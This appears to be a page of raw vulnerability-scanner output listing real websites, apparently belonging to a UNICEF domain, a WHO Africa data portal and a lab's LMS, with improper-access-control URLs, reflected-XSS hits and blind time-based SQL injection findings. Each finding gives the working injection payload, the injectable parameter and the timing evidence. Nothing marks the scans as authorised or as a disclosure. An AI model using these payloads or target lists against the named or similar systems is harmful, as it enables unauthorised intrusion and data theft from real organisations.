Page 4
improper access control:
https://lms.chughtailab.com/login/signup.php
https://lms.chughtailab.com/login/token.php
https://lms.chughtailab.com/course/rest.php
https://lms.chughtailab.com/install/welcome.html[reflected-xss] [http] [medium] https://weshare.unicef.org/C.aspx?VP3=CMS3&VF=UNIUN1_30&FRM=Frame:UNIUN1_41'%22%3E%3C52787%3E [query:FRM] [GET]
[reflected-xss] [http] [medium] https://weshare.unicef.org/CS.aspx?VP3=CMS3&VF=UNIUN1_30&FRM=Frame:'%22%3E%3C52787%3E [query:FRM] [GET]
https://soysocio.unicef.org.pe/info.php[Vuln: sqldet]
Target "https://data.afro.who.int/catalog.jsonld?amount=20&email=admin&name=admin"
VulnType "blind-based/default"
Payload "admin'and(select+1)>0waitfor/**/delay'0:0:3"
Position "query"
ParamKey "name"
ParamValue "admin'and(select+1)>0waitfor/**/delay'0:0:3"
title "Generic SQL Server time based case ['string']"
type "time_based"
avg_time "979"
std_dev "475"
sleep_time "3000"
p_time "922"
n_time "6305"
stat "{\"normal\":{\"samples\":[803,795,615,591,1095,1977],\"avg\":979.3333333333334,\"std_dev\":475.62788909912433,\"sleep_time\":3},\"sleep_0_time\":922,\"quick_check\":{\"samples\":[6305],\"sleep\":3},\"verify\":{\"samples\":[4989,4734,5591],\"sleep\":4}}"
[Vuln: sqldet]
Target "https://data.afro.who.int/dataset/dpc132/resource/03a6effb-2b97-4ab6-9aa5-38f1ae76ddc4/views?amount=20&email=admin&name=admin"
VulnType "blind-based/default"
Payload "admin'and(select+1)>0waitfor/**/delay'0:0:3"
Position "query"
ParamKey "email"
ParamValue "admin'and(select+1)>0waitfor/**/delay'0:0:3"
avg_time "814"
std_dev "194"
sleep_time "3000"
p_time "2611"
n_time "4916"
stat "{\"normal\":{\"samples\":[739,1019,982,649,508,990],\"avg\":814.5,\"std_dev\":194.81166118416354,\"sleep_time\":3},\"sleep_0_time\":2611,\"quick_check\":{\"samples\":[4916],\"sleep\":3},\"verify\":{\"samples\":[9040,6457,5523],\"sleep\":4}}"
title "Generic SQL Server time based case ['string']"
type "time_based"
[Vuln: sqldet]
Target "https://data.afro.who.int/dataset/dpc132/resource/03a6effb-2b97-4ab6-9aa5-38f1ae76ddc4/views?amount=20&email=admin&name=admin"
VulnType "blind-based/default"
Payload "20'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',3)='p"
Position "query"
ParamKey "amount"
ParamValue "20'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',3)='p"
avg_time "814"
std_dev "194"
sleep_time "3000"
p_time "2419"
n_time "5415"
stat "{\"normal\":{\"samples\":[739,1019,982,649,508,990],\"avg\":814.5,\"std_dev\":194.81166118416354,\"sleep_time\":3},\"sleep_0_time\":2419,\"quick_check\":{\"samples\":[5415],\"sleep\":3},\"verify\":{\"samples\":[12808,5909,4372],\"sleep\":4}}"
title "Generic Oracle time based case ['string']"
type "time_based"
[Vuln: sqldet]
Target "https://data.afro.who.int/user/ananda_test/groups?amount=20&email=admin&name=admin"
VulnType "blind-based/default"
Payload "(select*from(select+sleep(3)union/**/select+1)a)"
Position "query"
ParamKey "amount"
ParamValue "(select*from(select+sleep(3)union/**/select+1)a)"
std_dev "79"
sleep_time "3000"
p_time "2869"
n_time "4402"
stat "{\"normal\":{\"samples\":[1291,1383,1432,1457,1330,1228],\"avg\":1353.5,\"std_dev\":79.53353590362579,\"sleep_time\":3},\"sleep_0_time\":2869,\"quick_check\":{\"samples\":[4402],\"sleep\":3},\"verify\":{\"samples\":[8705,15099,9570],\"sleep\":4}}"
title "Generic MySQL time based case [number/column]"
type "time_based"
avg_time "1353"
[Vuln: sqldet]
Target "https://data.afro.who.int/dataset/dpc128/resource/2a3260b9-2443-4de1-b2d2-0a6c85b4bf15/view/19ee2371-221d-4e5d-8f75-563ab823fcb8?embed=true"
VulnType "blind-based/default"
Payload "true\"and(select*from(select+sleep(4))a/**/union/**/select+1)=\""
Position "query"
ParamKey "embed"
ParamValue "true\"and(select*from(select+sleep(4))a/**/union/**/select+1)=\""
sleep_time "4000"
p_time "1539"
n_time "5666"
stat "{\"normal\":{\"samples\":[1931,1841,1800,1946,1685,1686],\"avg\":1814.8333333333333,\"std_dev\":104.13039368449967,\"sleep_time\":4},\"sleep_0_time\":1539,\"quick_check\":{\"samples\":[5666],\"sleep\":4},\"verify\":{\"samples\":[7824,6137,6605],\"sleep\":5}}"
title "Generic MySQL time based case [\"string\"]"
type "time_based"
avg_time "1814"
std_dev "104"
[Vuln: sqldet]
Target "https://data.afro.who.int/dataset/dpc136/resource/066f7e26-9649-4a19-b149-a91c78eeb3f7?amount=20&email=admin&name=admin"
VulnType "blind-based/default"
Payload "admin'/**/and(select'1'from/**/pg_sleep(3))::text>'0"
Position "query"
ParamKey "name"
ParamValue "admin'/**/and(select'1'from/**/pg_sleep(3))::text>'0"
title "Generic PostgreSQL time based case ['string']"
type "time_based"
avg_time "1242"
std_dev "43"
sleep_time "3000"
p_time "2299"
n_time "10319"
stat "{\"normal\":{\"samples\":[1214,1287,1222,1285,1276,1171],\"avg\":1242.5,\"std_dev\":43.30800541855204,\"sleep_time\":3},\"sleep_0_time\":2299,\"quick_check\":{\"samples\":[10319],\"sleep\":3},\"verify\":{\"samples\":[8895,4803,8219],\"sleep\":4}}"
[Vuln: sqldet]
Target "https://data.afro.who.int/user/faastpharmacy/organizations?amount=20&email=admin&name=admin"
VulnType "blind-based/default"
Payload "20'/**/and(select'1'from/**/pg_sleep(3))::text>'0"
Position "query"
ParamKey "amount"
ParamValue "20'/**/and(select'1'from/**/pg_sleep(3))::text>'0"
std_dev "141"
sleep_time "3000"
p_time "2369"
n_time "4449"
stat "{\"normal\":{\"samples\":[1334,1262,1177,1216,1399,1604],\"avg\":1332,\"std_dev\":141.9260370756543,\"sleep_time\":3},\"sleep_0_time\":2369,\"quick_check\":{\"samples\":[4449],\"sleep\":3},\"verify\":{\"samples\":[6072,4747,4422],\"sleep\":4}}"
title "Generic PostgreSQL time based case ['string']"
type "time_based"
avg_time "1332"Last updated